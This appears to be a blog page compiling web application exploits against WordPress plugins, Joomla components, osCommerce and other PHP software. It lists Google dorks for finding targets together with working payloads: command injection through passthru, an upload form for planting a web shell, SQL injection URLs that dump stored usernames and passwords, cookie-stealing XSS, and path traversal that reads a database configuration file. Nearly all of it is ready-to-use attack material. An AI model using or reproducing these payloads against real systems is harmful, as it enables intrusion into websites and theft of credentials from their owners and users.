Web Application Exploits

The vulnerability exists in /is-human/engine.php
Execution running the linux whoami command:

http://server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error

===========================================================================
Software Link: [http://www.jdownloads.com/index.php?option=com_jdownloads&Itemid=133&task=view.download&catid=22&cid=234]
Version: Version:1.0
Dork : "Powered by jDownloads"

# Example   http://www.site.com/public-relations/ተስትሞንአልስ
# Example   http://www.site.com/index.php?/component/option,com_jdownloads/Itemid,70/task,view.upload/

===========================================================================
# Google Dork: [powered by oscommerce]  (we will automatically add these to the GHDB)
<form name="new_banner" action="http://site/path/admin/banner_manager.php/login.php?action=insert" method="post" enctype="multipart/form-data"><br>
<input type="file" name="banners_image"><br>
<input name="submit" value=" Save " type="submit"></form>
you will find your shell in

http://site/path/images/yourshell.php

===========================================================================
# Google dork: intext:"Powered by Travel411.com"

Find Any File Like (info.php?id=) or (reservations.php?id=)
#  http://localhost/info.php?id=SQLI
#  http://localhost/info.php?id=-00030+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15--

===========================================================================
Ajax Category Dropdown wordpress plugin
Vulnerable Version: 0.1.5
Vulnerability Type: XSS (Cross Site Scripting)
The following PoC is available:

http://server/wp-content/plugins/ajax-category-dropdown/includes/dhat-ajax-cat-dropdown-request.php?admin&category_id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

===========================================================================
Dork : "Powered by Vinyad dynMedia Pro 4.0"
[ Example ]
http://www.example.com/downloadfile.php?dwnfile=../library/dbconnect.php
===========================================================================
 
WordPress SermonBrowser Plugin 0.43 SQL Injection
# Real Bug Founder : Lagripe-Dz

Exploit :
# SQL Inj : http://site/wp/?sermon_id=-1+union+select+version(),2--
# XSS     : http://site/wp/?download&file_name=<script>alert(0)</script>
# FPD     : http://site/wp/wp-content/plugins/sermon-browser/sermon.php

===========================================================================
Joomla Component com_question SQL Injection Vulnerability

Exploit :
# http://localhost/Joomla/index.php/?option=com_question&catID=[SQL]
# http://localhost/Joomla/index.php/?option=com_question&catID=21' and+1=0 union all
# select 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20

Demo:
# http://site.com/index.php/?option=com_question&catID=21' and+1=0 union all select # | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20

Copyright © / Rahasia SEO Blog™

Powered by :blogger